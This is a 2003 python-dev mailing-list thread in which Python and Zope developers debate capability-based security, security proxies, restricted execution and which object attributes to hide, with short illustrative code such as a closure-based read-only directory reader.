[Moving a discussion about capabilities to where it arguably belongs]
Thanks Guido. I'll respond to Ben here.
[Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore.
Right. Jeremy keeps remining me of this point. Zope 3 uses proxies in a way that doesn't conform to this definition. Zope proxies proxy an object to be protected *and* a policy object called a "checker". The checkers used in Zope perform checks at access time. One could, instead, perform the checks when the proxies are created or earlier and use checkers that simply allowed some names or operations and not others. IOW, you could certainly implement a strict capability model with Zope proxies. ...
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
I'll give an answer similar to Guido's but with a different emphasis. I'm an object zealot. :) I like working with object oriented systems. I don't want to lose that and, thus, I don't want computation to be reduced to passing around basic values and functions. I want to be able to pass around objects with interfaces. Zope proxies make it easy to define a capability in terms of an interface. I think this is really important for object-oriented systems. Another feature of Zope proxies that I think is important is that they automate creation of proxies. When you get an attribute from a proxy, the value is proxied. (Actually, the checker decides whether the value is proxied. Zope checkers proxy all objects except basic objects such as numbers, strings, and None.) When you perform an operation on a proxied object, the result is proxied. This means that the code being proxied doesn't have to be aware of proxies, capabilities, or a security model. Note that when you access a method on a proxied object, the method itself is proxied. All you can to with a proxied method is call it, get it's name, and convert it to a string. This is true even of the proxied method is passed to unrestricted code. I agree that we all need restricted execution to work better than it does now. I was hoping that we could colaborate at a higher level as well. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry.
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
I think the capability folks would object to calling it a capability though. :-) Two questions: - Where to store the flag? It probably would cost 4 bytes per object. - Which attributes are considered introspective? --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
I think the capability folks would object to calling it a capability though. :-)
No, objects are another way to do it, though it seems to me with somewhat less ease - because the most common use of capabilities is to restrict the type of access to objects other objects have, so you'd need to have multiple objects proxying to the "real" one if you do it at the object level. If we were going to go this route, I'd like the alternative of _also_ being able to set the flag on a bound method.
Two questions:
- Where to store the flag? It probably would cost 4 bytes per object.
You can swap space for time by storing it as an attribute, of course.
- Which attributes are considered introspective?
All of them, except methods. Of course, this is what my first approximation to capabilities did (that's what a "capclass" was). Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
[Someone else]
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Guido van Rossum wrote:
I think the capability folks would object to calling it a capability though. :-)
[Ben]
No, objects are another way to do it, though it seems to me with somewhat less ease - because the most common use of capabilities is to restrict the type of access to objects other objects have, so you'd need to have multiple objects proxying to the "real" one if you do it at the object level.
I'm not sure I understand. Do you mean that because there may be several security levels you'd need different capabilities for an object for each level? Since there are also several methods, you end up managing multiple capabilities in either case. Anyway, Zope security proxies aren't "managed" this way. The trusted code doesn't have a set of objects representing capabilities that it hands out -- a proxy is manufactured freshly on each use. I wonder if this might be one cause of repeated misunderstandings?
If we were going to go this route, I'd like the alternative of _also_ being able to set the flag on a bound method.
Two questions:
- Where to store the flag? It probably would cost 4 bytes per object.
You can swap space for time by storing it as an attribute, of course.
Not all Python objects have a dict where to store arbitrary attributes. And even if they do, that's about the most expensive way to store a flag. And you'd have to worry about someone getting a hold of that dict and deleting the attribute (assuming that the flag defaults to allow introspection, otherwise no Python code written today would continue to work).
- Which attributes are considered introspective?
All of them, except methods.
That's not very Pythonic.
Of course, this is what my first approximation to capabilities did (that's what a "capclass" was).
I never knew what a capclass was. I don't think you ever explained it so clearly ("doesn't allow access to non-method attributes") before. --Guido van Rossum (home page: http://www.python.org/~guido/)
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head: 1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__). 2. The following instance attributes are off limits: __class__, __dict__, __module__. That might be a reasonable start. However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state. -- ?!ng
Ka-Ping Yee wrote:
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Well, I see no harm and much usefulness in allowing __name__, __repr__, and __str__.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
That might be a reasonable start.
I generally want to be able to get the __class__. This is harmless in my case, because I get a proxy back.
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I'm don't understand why this is necessary. In general, you want to restrict what attributes (data, properties, methods, etc.) are accessible in certain situations. I don't follow what makes data attributes special. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
On Mon, 10 Mar 2003, Jim Fulton wrote:
Ka-Ping Yee wrote:
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Well, I see no harm and much usefulness in allowing __name__, __repr__, and __str__.
Depends. In a truly secure system, classes would only reveal information about themselves if they wanted to. The default __repr__ gives away to the id() of the instance, and __name__ gives away the name of the method, which would prevent you from creating proxies that are indistinguishable from the original. Sometimes it is useful to be able to do that.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
I generally want to be able to get the __class__. This is harmless in my case, because I get a proxy back.
We definitely do not want to provide access to __class__. Access to an instance should not give you the power to create more instances of its class. If you passed somebody a file object, access to the class would convey the power to open any file on the filesystem!
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I'm don't understand why this is necessary. In general, you want to restrict what attributes (data, properties, methods, etc.) are accessible in certain situations. I don't follow what makes data attributes special.
Instances currently don't have a private place to put their state, and unless there is a convenient way do that, implementers will tend to expose their instance state in public data attributes. Even if the instance had properties, the properties still (as yet) have no way to conveniently distinguish if access is being attempted from within an instance method, or from outside the instance. -- ?!ng
From: "Ka-Ping Yee" <ping@zesty.ca>
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
Indeed, that's the fact that implementations of methods are normal functions that access the instance attributes like everything else do, that's why Zope-proxies become necessary (and a bit brittle): class A: def geta(self): return self.a # 1 a=A() a.a # 2 (1) and (2) are using the same operation/execution path. The other issue, as you wrote, is also that introspection operations are like normal operations too (and they share the same execution path also): a.__dict__ vs. introspect(a).__dict__ The problem is that there is obviously a flexibility/easy-of-use trade-off. Python is a language that maximizes that and where e.g. introspection feels easy and natural, OTOH analyzing security become nightmarish. regards.
Samuele Pedroni wrote:
From: "Ka-Ping Yee" <ping@zesty.ca>
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
Indeed, that's the fact that implementations of methods are normal functions that access the instance attributes like everything else do, that's why Zope-proxies become necessary (and a bit brittle):
class A: def geta(self): return self.a # 1
a=A()
a.a # 2
(1) and (2) are using the same operation/execution path.
This points out a nice feature of zope proxies. The proxied object's methods are called with an unproxied self, so you can easily allow access to the object's methods without providing access to other attributes. Or, equivalently, you can provide access to one set of methods and those methods can use other methods that you don't provide access to. Could you explain why you say that zope proxies are brittle? Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedIntepreter: you wrap into proxies a lot of builtins: *) 'object' for example, then class C(object): ... does not work but given that some basic types are left alone, one can use Type = ''.__class__.__class__ class C: __metaclass__ = Type *) iter seems not to work (deliberate decision or bug?) *) proxied 'property' is unusable *) built-in functions return proxies even if the argument were unproxied: _12 = map(None,[1,2]) class A: pass a = A() a.a = [1,2] _12 = getattr(a,'a') in both cases with the proxied version of map and getattr the result _12 would be a proxied list. deliberate safer-side decisions? I can see it both ways: - see other mail - map(None,[obj])[0] becomes a way to get a a proxied version of obj that can be passed to code that would maybe unwrap it and believe that is some other legit object. regards.
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedIntepreter:
Um, er, I've been meaning to mention that RestrictedIntepreter is not does and isn't used anywhere yet. It's a bit of a decoy at this time. :] At this point, RestrictedIntepreter is really an incomplete prototype. OTOH, RestrictedBuiltins is used for Python expressions in Zope page templates. Simple Python expressions in zpt don't tend to run into the sorts of problems you've found.
you wrap into proxies a lot of builtins:
*) 'object' for example, then class C(object): ... does not work
Right. We will fix this. It should be possible to subclass proxied classes. The resulting classes should then be proxies. object and type should probably be special cases.
but given that some basic types are left alone, one can use Type = ''.__class__.__class__
class C: __metaclass__ = Type
*) iter seems not to work (deliberate decision or bug?)
bug I imagine.
*) proxied 'property' is unusable
ditto
*) built-in functions return proxies even if the argument were unproxied:
_12 = map(None,[1,2])
Interesting case. It looks like map shouldn't be proxied.
class A: pass a = A() a.a = [1,2]
_12 = getattr(a,'a')
Ditto.
in both cases with the proxied version of map and getattr the result _12 would be a proxied list.
deliberate safer-side decisions?
no.
I can see it both ways: - see other mail
I don't know what other mail you are refering to. Maybe it doesn't matter.
- map(None,[obj])[0] becomes a way to get a a proxied version of obj that can be passed to code that would maybe unwrap it and believe that is some other legit object.
Any code that unwraps proxies should be viewed with great suspicion. I currently consider any use of that API without an extensive accompanying comment to be a virtual "XXX" comment. I'm sorry to have had you spend so much time on what is a bit od a decoy. OTOH, you've pointed out a number of points that we do need to address to move our RestrictedInterpreter beyond the prototype stage. You've found a number of problems and issues in deciding how to proxy builtins. I would argue that these are not problems in the proxies themselves but in the applications to builtins. But perhaps I'm wrong. Another area that we haven't dealt with yet is how proxies will work in untrusted *persistent* modules. But you probably don't want to know about that. ;) Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
From: "Jim Fulton" <jim@zope.com>
I can see it both ways: - see other mail
I don't know what other mail you are refering to. Maybe it doesn't matter.
the other side of the coin, is that with a working unproxied/non-proxying property and/or a non-proxied map&getattr and a unproxied MyExc instance, I can break out restricted execution.
From: "Jim Fulton" <jim@zope.com>
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedIntepreter:
Um, er, I've been meaning to mention that RestrictedIntepreter is not does and isn't used anywhere yet. It's a bit of a decoy at this time. :]
I knew it isn't used. I'm not that naive, it seemed nevertheless a show-case/playground of proxy+restricted execution approach. regards.
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Plus __repr__ and __str__. And if they have attributes at all they have __getattribute__. And if they are callable they have __call__.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
That might be a reasonable start.
Not sure. Classic rexec disallowed these (and a few more), but the problem with disallowing __dict__ of an instance was that this made it impossible for untrusted code to use certain coding patterns like overriding __setattr__.
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I wonder if we could write special descriptors for this? The problem as I see it is that the interpreter doesn't keep track of whether a particular function is part of a class definition or not, so there's no way to tell whether it should have access to private data or not. Proxies get around this, but with the stated disadvantages. --Guido van Rossum (home page: http://www.python.org/~guido/)
Greg Ewing wrote:
E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry.
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Yes, but not a very useful one. For example, given a file, you often want to create a "file read" capability which is an object that allows reading the file but not writing the file. Just preventing introspection isn't enough. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
On Mon, 10 Mar 2003, Jim Fulton wrote:
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Yes, but not a very useful one. For example, given a file, you often want to create a "file read" capability which is an object that allows reading the file but not writing the file. Just preventing introspection isn't enough.
All right. Let me provide an example; maybe this can help ground the discussion a bit. We seem to be doing a lot of dancing around the issue of what a capability is. In my view, it's a red herring to discuss whether or not a particular object "is a capability" or not. It's like asking whether something is an "object". Capabilities are a discipline under which objects are used -- it's better to think of them as a technique or a style of programming. What is at issue here (IMHO) is "how might Python change to facilitate this style of programming?" (The analogy with object-oriented programming holds here also. Even if Python didn't have a "class" keyword, you could still program in an object-oriented style. In fact, the C implementation of Python is clearly object-oriented, even though C has no features specifically designed for OOP. But adding "class" made it a lot easier to do a particular style of object-oriented programming in Python. Unfortunately, the particular style encouraged by Python's "class" keyword doesn't work so well for capability-style programming, because all instance state is public. But Python's "class" is not the only way to do object-oriented programming -- see below.) Okay, at last to the example, then. Here is one way to program in a capability style using today's Python, relying on no changes to the interpreter. This example defines a "class" called DirectoryReader that provides read-only access to only a particular subtree of the filesystem. import os class Namespace: def __init__(self, *args, **kw): for value in args: self.__dict__[value.__name__] = value for name, value in kw.items(): self.__dict__[name] = value class ReadOnly(Namespace): def __setattr__(self, name, value): raise TypeError('read-only namespace') def FileReader(path, name): self = Namespace(file=open(path, 'r')) def __repr__(): return '<FileReader %r>' % name def reset(): self.file.seek(0) return ReadOnly(__repr__, reset, self.file.read, self.file.close) def DirectoryReader(path, name): def __repr__(): return '<DirectoryReader %r>' % name def list(): return os.listdir(path) def readfile(name): fullpath = os.path.join(path, name) if os.path.isfile(fullpath): return FileReader(fullpath, name) def getdir(name): fullpath = os.path.join(path, name) if os.path.isdir(fullpath): return DirectoryReader(fullpath, name) return ReadOnly(__repr__, list, readfile, getdir) Now, if we pass an instance of DirectoryReader to code running in restricted mode, i think this is actually secure. Specifically, the only introspective attributes we have to disallow, in order for these objects to enforce their intended restrictions, are im_self and func_globals. Of course, we still have to hide __import__ and sys.modules if we want to prevent code from obtaining access to the filesystem in other ways. Hiding __dict__, while it has no impact on restricting filesystem access, allows us to pass the same DirectoryReader object to two clients without inadvertently creating a communication channel between them. -- ?!ng
On Sat, 29 Mar 2003, Ka-Ping Yee wrote:
Okay, at last to the example, then.
The following is a better formulation in the capability style -- please ignore the previous one. The previously posted code allows names to carry authority, which is a big no-no. This code gets rid of names altogether in the API for file access; it's better to deal with just objects. import os, __builtin__ class Namespace: def __init__(self, *args, **kw): for value in args: self.__dict__[value.__name__] = value for name, value in kw.items(): self.__dict__[name] = value class ImmutableNamespace(Namespace): def __setattr__(self, name, value): raise TypeError('read-only namespace') def ReadStream(file, name): def __repr__(): return '<ReadStream %r>' % name return ImmutableNamespace(__repr__, file.read, file.close, name=name) def FileReader(path, name): def __repr__(): return '<FileReader %r>' % name def open(): return ReadStream(__builtin__.open(path, 'r'), name) def getsize(): return os.path.getsize(path) def getmtime(): return os.path.getmtime(path) return ImmutableNamespace(__repr__, open, getsize, getmtime, name=name) def DirectoryReader(path, name): def __repr__(): return '<DirectoryReader %r>' % name def getfiles(): files = [] for name in os.listdir(path): fullpath = os.path.join(path, name) if os.path.isfile(fullpath): files.append(FileReader(fullpath, name)) return files def getdirs(): dirs = [] for name in os.listdir(path): fullpath = os.path.join(path, name) if os.path.isdir(fullpath): dirs.append(DirectoryReader(fullpath, name)) return dirs return ImmutableNamespace(__repr__, getfiles, getdirs, name=name) -- ?!ng
Ka-Ping Yee wrote:
...
Specifically, the only introspective attributes we have to disallow, in order for these objects to enforce their intended restrictions, are im_self and func_globals. Of course, we still have to hide __import__ and sys.modules if we want to prevent code from obtaining access to the filesystem in other ways.
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;) Part of the trick is that the external names are irrelevant to the functioning of the object. I don't understand one thing. The immutability imposed by the "ImmutableNamespace" trick is easy to turn off. But once I turn it off, I couldn't figure out any way to violate the security because the closure's variables are invisible to any code that is not defined within its block. Why bother with the ImmutableNamespace bit at all? x = DirectoryReader(".", "foo") print x.getfiles() del x.__class__.__setattr__ x.foo = 5 del x.getfiles del x.getdirs x.getfiles() Traceback (most recent call last): File "../foo.py", line 64, in ? x.getfiles() AttributeError: ImmutableNamespace instance has no attribute 'getfiles' But I couldn't figure out how to use this to get access to the file system because as I said before, the external names are irrelevant to the object's implementation. They are early bound. def FileReader(path, name): ... def open2(): print "open2" return open() direct = DirectoryReader(".", "foo") file = direct.getfiles()[0] print file.open2() FileReaderClass = file.__class__ del FileReaderClass.__setattr__ del file.open print file.open2() "open2" binds to open at definition time, not at runtime. I can't see in this model how to implement what C++ calls a "friend" class. Even C++ and Java have ways that related classes can poke around each others internals. So perhaps this is part of what would need to change in Python to have a first-class capabilities feature. If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying. Paul Prescod
On Sun, 30 Mar 2003, Paul Prescod wrote:
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;)
Sorry. :) I assumed it would be clear.
I don't understand one thing.
The immutability imposed by the "ImmutableNamespace" trick is easy to turn off. But once I turn it off, I couldn't figure out any way to violate the security because the closure's variables are invisible to any code that is not defined within its block. Why bother with the ImmutableNamespace bit at all?
That immutability isn't required in order to prevent filesystem access. That immutability is only there to prevent multiple clients of the same DirectoryReader to use the DirectoryReader as a communication channel.
del x.__class__.__setattr__
Sneaky. :) In restricted mode you wouldn't be able to do that.
I can't see in this model how to implement what C++ calls a "friend" class.
I haven't tried an example that requires that yet, but two classes could communicate through access to a shared object if they wanted to.
If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying.
The Namespace offers a possible workaround. I didn't end up using it in my second code example because none of the objects have mutable state, but here's how you could do it: def Counter(): self = Namespace() self.i = 0 def next(): self.i += 1 return self.i return ImmutableNamespace(next) It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive. -- ?!ng
Ka-Ping Yee wrote:
On Sun, 30 Mar 2003, Paul Prescod wrote:
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;)
Sorry. :) I assumed it would be clear.
It probably is for those following the thread more closely.
That immutability isn't required in order to prevent filesystem access.
Okay, now I see that that's what you meant about "__dict__". You were talking about the object's. namespace in general, not the magical attribute named __dict__.
...
del x.__class__.__setattr__
Sneaky. :)
I would have complimented you on the elegance of this proposal but I thought it might just be a translation of E's object construct. To whatever extent you innovated in creating it, congratulations, it's very cool.
....In restricted mode you wouldn't be able to do that.
I'm not clear (because I've been following the thread with half my brain, over quite a few days) whether you are making or have made some specific proposal. I guess you are proposing a restricted mode that would make this example actually secure as opposed to almost secure. Are you also proposing any changes to the syntax? Also, is restricted mode an interpreter mode or is it scoped by module? I can't see how it would work as an interpreter mode because too much library code depends on introspectability and hackability of Python objects.
I can't see in this model how to implement what C++ calls a "friend" class.
I haven't tried an example that requires that yet, but two classes could communicate through access to a shared object if they wanted to.
This doesn't actually simulate "friend" but that's probably because friend makes no sense in a capability system. It occurs to me after further thought that there are two orthogonal problems. First is privacy for the sake of software engineering. Python has always rejected that and I'm glad it has (although it makes advocacy harder). This sort of privacy just gets in your way when you're trying to coerce code into doing what you want when it wasn't designed to. Languages like C++ make it really hard to hack when you need to, but they don't really prevent you from doing it if you are determined enough, so you have the worst of both worlds. Second, is safety for the sake of security. IF you have chosen the capabilities model of security, THEN "friend" perhaps doesn't make sense. You either have a capability reference or you don't. The code's compile-time class or package is irrelevant. Allowing classes (as opposed to objects) to declare each other friends probably only opens up security holes. But if you want to have an example of something like this for the record books, perhaps you could implement an iterator over a data structure with the caveat that we'd like to implement the iterator and data structure in separate files (because sometimes the implementation of each could be large and complicated). I think it works like this: The Data structure is one capability class. The iterator is another. The application asks the data structure to create an iterator. The data structure creates one and passes some subset of its internal state to the new object. It probably could not (and anyway should not) pass a pointer to the opaque closure that is its external representation. So instead it passes in whatever state variables the iterator is likely to be interested in. If you did want to emulate class-based "friendship" (can't think of why, off the top of my head) you could do so like this: def tellMeYourSecrets(myfriend): if instanceof(myfriend, MyFriendClass): return my_namespace() else: raise SecurityViolation, "Bug off" The example in Stroustrop is where you want a vector class to be able to directly read the internals of a matrix class rather than go through inefficient method calls. But in a capabilities universe, even matrices can't, in general, see the internals of other matrices. I guess they'd have to use the trick above if that was really necessary.
If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying.
The Namespace offers a possible workaround.
Yes, but why workaround rather than fix? Is there a deep reason Python objects can't write to intermediate namespaces? Is it just a little bit of extra safety against accidentally overwriting something? This is probably overkill in the case of intermediate scopes. And if not, there could be a keyword which is like global but for intermediate scopes.
... It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive.
Unfortunately, most of the examples I can come up with seem to be hacks, workarounds and optimizations. It isn't surprising that sometimes you lose some efficiency or simplicity when working in a secure system. It makes me wonder about whether E might be less fun, efficient and productive than Python because security is embedded so deeply within it? (just a speculation...I don't know E) A Python that could go back in forth from secure mode to insecure mode might be a nice compromise. Paul Prescod
On Sun, 30 Mar 2003, Paul Prescod wrote:
I'm not clear (because I've been following the thread with half my brain, over quite a few days) whether you are making or have made some specific proposal. I guess you are proposing a restricted mode that would make this example actually secure as opposed to almost secure. Are you also proposing any changes to the syntax?
Not yet. Although it's certainly tempting to propose syntax changes, it makes more sense to really understand what we want first. We can't know that until we've actually tried programming in the capability style in Python. That's why i want to explore the possibilities and try these exercises -- it will help us discover the shortest path from here to there.
Also, is restricted mode an interpreter mode or is it scoped by module?
Whether restricted mode is activated depends on the __builtins__ of the current namespace. So the short answer is "by module".
Yes, but why workaround rather than fix? Is there a deep reason Python objects can't write to intermediate namespaces?
No. There's just no syntax for it yet. But let's figure out what we can get away with first.
It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive.
Unfortunately, most of the examples I can come up with seem to be hacks, workarounds and optimizations. It isn't surprising that sometimes you lose some efficiency or simplicity when working in a secure system.
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier. -- ?!ng
Ka-Ping Yee wrote:
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Okay, how about allowing a piece of untrusted code to import modules from a selected subset of all modules. For instance you probably want to allow untrusted code to get access to regular expressions and codecs (after taming!) but not os or socket. Speaking of sockets, web browsers often allow connections to sockets only at a particular domain. In a capabilities world, I guess the domain would be an object that you could request sockets from. Are DOS issues in scope? How do we prevent untrusted code from just bringing the interpreter to a halt? A smart enough attacker could even block all threads in the current process by finding a task that is usually not time-sliced and making it go on for a very long time. without looking at the Python implementation, I can't remember an example off of the top of my head, but perhaps a large multiplication or search-and-replace in a string. Paul Prescod
Paul Prescod wrote:
Are DOS issues in scope? How do we prevent untrusted code from just bringing the interpreter to a halt? A smart enough attacker could even block all threads in the current process by finding a task that is usually not time-sliced and making it go on for a very long time. without looking at the Python implementation, I can't remember an example off of the top of my head, but perhaps a large multiplication or search-and-replace in a string.
It seems to me that this is an issue orthogonal to capabilities (though access to mechanisms that regulate it might well be capability-based). Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
On Mon, Mar 31, 2003, Ka-Ping Yee wrote:
I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Okay, how about using LDAP to secure access to a database and give each user appropriate privileges? I'm just throwing this in as an example of mediated access that's required to be effective in the Real World [tm]; I'm sure you can think of simpler examples if you want. -- Aahz (aahz@pythoncraft.com) <*> http://www.pythoncraft.com/ This is Python. We don't care much about theory, except where it intersects with useful practice. --Aahz, c.l.py, 2/4/2002
Ka-Ping Yee wrote:
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Well, one of the favourites is to create a file selection dialog that will only give access (optionally readonly) to the file designated by the user. This may be rather more than you want to bite off as a working system at this stage, though! It might be a useful thought experiment, though. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda. Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you. It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects? (Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.) If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure". I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper. The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example, class Foo: pass print Foo.__dict__ # fails from sys import introspect print introspect(Foo).__dict__ # succeeds When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away). This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something. -- ?!ng
Ka-Ping Yee wrote:
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
I'm pretty sure that Guido meant to say "bound method" rather than "capability" in the text above. I think that the debate is partly whether to express capabilities (or some other scheme) in terms of bound methods or proxies, which expose entire interfaces.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
There are a bunch of confusions floating around. :) A major one is a concise definition os what a capability and why the capability approach is good or bad. In reading about capabilities in E, http://www.erights.org/. I really need to read all that stuff again. Of course, as others pointed out, I ended up creating something for Zope 3 that isn't capabilities. I think you touch on a reason below.
Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect print introspect(Foo).__dict__ # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
